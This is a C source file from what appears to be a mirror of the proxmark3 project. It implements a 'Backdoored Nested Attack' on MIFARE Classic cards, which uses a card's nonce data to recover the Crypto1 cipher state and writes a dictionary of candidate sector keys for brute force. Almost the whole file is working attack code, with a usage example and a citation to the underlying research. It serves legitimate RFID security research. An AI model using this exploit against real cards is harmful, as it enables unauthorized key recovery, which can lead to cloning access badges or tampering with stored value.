mirror of
https://github.com/RfidResearchGroup/proxmark3.git
synced 2024-11-15 22:29:52 +08:00
184 lines
5.6 KiB
C
184 lines
5.6 KiB
C
// Backdoored Nested Attack
|
|
//
|
|
// Attack conditions:
|
|
// * Backdoor, or a way to know the clear static nested nT
|
|
//
|
|
// Strategy:
|
|
// * Use backdoor on the targeted sector to get the clear static nested nT
|
|
// * Enumerate key candidates based on clear and encrypted nT
|
|
// * Use the resulting dictionary to bruteforce the key
|
|
//
|
|
// Doegox, 2024, cf https://eprint.iacr.org/2024/1275 for more info
|
|
|
|
#include <stdio.h>
|
|
#include <stdlib.h>
|
|
#include <string.h>
|
|
#include <inttypes.h>
|
|
#include "common.h"
|
|
#include "crapto1/crapto1.h"
|
|
#include "parity.h"
|
|
|
|
#define KEY_SPACE_SIZE (1 << 18)
|
|
|
|
typedef struct {
|
|
uint32_t authuid;
|
|
uint32_t nt;
|
|
uint32_t nt_enc;
|
|
uint8_t nt_par_enc;
|
|
} NtData;
|
|
|
|
static uint32_t hex_to_uint32(const char *hex_str) {
|
|
return (uint32_t)strtoul(hex_str, NULL, 16);
|
|
}
|
|
|
|
static int bin_to_uint8_arr(const char *bin_str, uint8_t bit_arr[], uint8_t arr_size) {
|
|
if (strlen(bin_str) != arr_size) {
|
|
fprintf(stderr, "Error: Binary string (%s) length does not match array size (%i).\n", bin_str, arr_size);
|
|
return 1;
|
|
}
|
|
|
|
for (uint8_t i = 0; i < arr_size; i++) {
|
|
if (bin_str[i] == '0') {
|
|
bit_arr[i] = 0;
|
|
} else if (bin_str[i] == '1') {
|
|
bit_arr[i] = 1;
|
|
} else {
|
|
fprintf(stderr, "Error: Invalid character '%c' in binary string.\n", bin_str[i]);
|
|
return 1;
|
|
}
|
|
}
|
|
return 0;
|
|
}
|
|
|
|
static uint64_t *generate_keys(uint64_t authuid, uint32_t nt, uint32_t nt_enc, uint32_t nt_par_enc, uint32_t *keyCount) {
|
|
|
|
uint64_t *result_keys = (uint64_t *)calloc(1, KEY_SPACE_SIZE * sizeof(uint64_t));
|
|
if (result_keys == NULL) {
|
|
fprintf(stderr, "\nCalloc error in generate_and_intersect_keys!\n");
|
|
return NULL;
|
|
}
|
|
|
|
struct Crypto1State *revstate, *revstate_start = NULL, *s = NULL;
|
|
uint64_t lfsr = 0;
|
|
uint32_t ks1 = nt ^ nt_enc;
|
|
|
|
revstate = lfsr_recovery32(ks1, nt ^ authuid);
|
|
if (revstate == NULL) {
|
|
fprintf(stderr, "\nCalloc error in generate_keys!\n");
|
|
free(result_keys);
|
|
return NULL;
|
|
}
|
|
|
|
revstate_start = revstate;
|
|
|
|
s = crypto1_create(0);
|
|
if (s == NULL) {
|
|
fprintf(stderr, "\nCalloc error in generate_keys!\n");
|
|
free(result_keys);
|
|
crypto1_destroy(revstate_start);
|
|
return 0;
|
|
}
|
|
|
|
while ((revstate->odd != 0x0) || (revstate->even != 0x0)) {
|
|
lfsr_rollback_word(revstate, nt ^ authuid, 0);
|
|
crypto1_get_lfsr(revstate, &lfsr);
|
|
|
|
// only filtering possibility: last parity bit ks in ks2
|
|
uint32_t ks2;
|
|
uint8_t lastpar1, lastpar2, kslastp;
|
|
crypto1_init(s, lfsr);
|
|
crypto1_word(s, nt ^ authuid, 0);
|
|
ks2 = crypto1_word(s, 0, 0);
|
|
lastpar1 = oddparity8(nt & 0xFF);
|
|
kslastp = (ks2 >> 24) & 1;
|
|
lastpar2 = (nt_par_enc & 1) ^ kslastp;
|
|
if (lastpar1 == lastpar2) {
|
|
result_keys[(*keyCount)++] = lfsr;
|
|
if (*keyCount == KEY_SPACE_SIZE) {
|
|
fprintf(stderr, "No space left on result_keys, abort! Increase KEY_SPACE_SIZE\n");
|
|
break;
|
|
}
|
|
}
|
|
revstate++;
|
|
}
|
|
|
|
crypto1_destroy(s);
|
|
crypto1_destroy(revstate_start);
|
|
revstate_start = NULL;
|
|
return result_keys;
|
|
}
|
|
|
|
int main(int argc, char *const argv[]) {
|
|
|
|
if (argc != 6) {
|
|
int cmdlen = strlen(argv[0]);
|
|
printf("Usage:\n %s <uid:hex> <sector:dec> <nt:hex> <nt_enc:hex> <nt_par_err:bin>\n"
|
|
" parity example: if for block 63 == sector 15, nt in trace is 7b! fc! 7a! 5b\n"
|
|
" then nt_enc is 7bfc7a5b and nt_par_err is 1110\n"
|
|
"Example:\n"
|
|
" %*s a13e4902 15 d14191b3 2e9e49fc 1111\n"
|
|
" %*s +uid +s +nt +nt_enc +nt_par_err\n",
|
|
argv[0], cmdlen, argv[0], cmdlen, "");
|
|
return 1;
|
|
}
|
|
|
|
uint64_t *keys = NULL;
|
|
uint32_t keyCount = 0;
|
|
|
|
uint32_t authuid = hex_to_uint32(argv[1]);
|
|
uint32_t sector = atoi(argv[2]);
|
|
uint32_t nt = hex_to_uint32(argv[3]);
|
|
uint32_t nt_enc = hex_to_uint32(argv[4]);
|
|
|
|
uint8_t nt_par_err_arr[4];
|
|
if (bin_to_uint8_arr(argv[5], nt_par_err_arr, 4)) {
|
|
return 1;
|
|
}
|
|
|
|
uint8_t nt_par_enc = ((nt_par_err_arr[0] ^ oddparity8((nt_enc >> 24) & 0xFF)) << 3) |
|
|
((nt_par_err_arr[1] ^ oddparity8((nt_enc >> 16) & 0xFF)) << 2) |
|
|
((nt_par_err_arr[2] ^ oddparity8((nt_enc >> 8) & 0xFF)) << 1) |
|
|
((nt_par_err_arr[3] ^ oddparity8((nt_enc >> 0) & 0xFF)) << 0);
|
|
|
|
printf("uid=%08x nt=%08x nt_enc=%08x nt_par_err=%u%u%u%u nt_par_enc=%u%u%u%u ks1=%08x\n"
|
|
, authuid
|
|
, nt
|
|
, nt_enc
|
|
, nt_par_err_arr[0]
|
|
, nt_par_err_arr[1]
|
|
, nt_par_err_arr[2]
|
|
, nt_par_err_arr[3]
|
|
, (nt_par_enc >> 3) & 1
|
|
, (nt_par_enc >> 2) & 1
|
|
, (nt_par_enc >> 1) & 1
|
|
, nt_par_enc & 1
|
|
, nt ^ nt_enc
|
|
);
|
|
|
|
|
|
printf("Finding key candidates...\n");
|
|
keys = generate_keys(authuid, nt, nt_enc, nt_par_enc, &keyCount);
|
|
|
|
printf("Finding phase complete, found %u keys\n", keyCount);
|
|
|
|
FILE *fptr;
|
|
char filename[30];
|
|
snprintf(filename, sizeof(filename), "keys_%08x_%02u_%08x.dic", authuid, sector, nt);
|
|
|
|
fptr = fopen(filename, "w");
|
|
if (fptr != NULL) {
|
|
if (keyCount > 0) {
|
|
for (uint32_t j = 0; j < keyCount; j++) {
|
|
fprintf(fptr, "%012" PRIx64 "\n", keys[j]);
|
|
}
|
|
}
|
|
fclose(fptr);
|
|
} else {
|
|
fprintf(stderr, "Warning: Cannot save keys in %s\n", filename);
|
|
}
|
|
|
|
if (keys != NULL) {
|
|
free(keys);
|
|
}
|
|
return 0;
|
|
}
|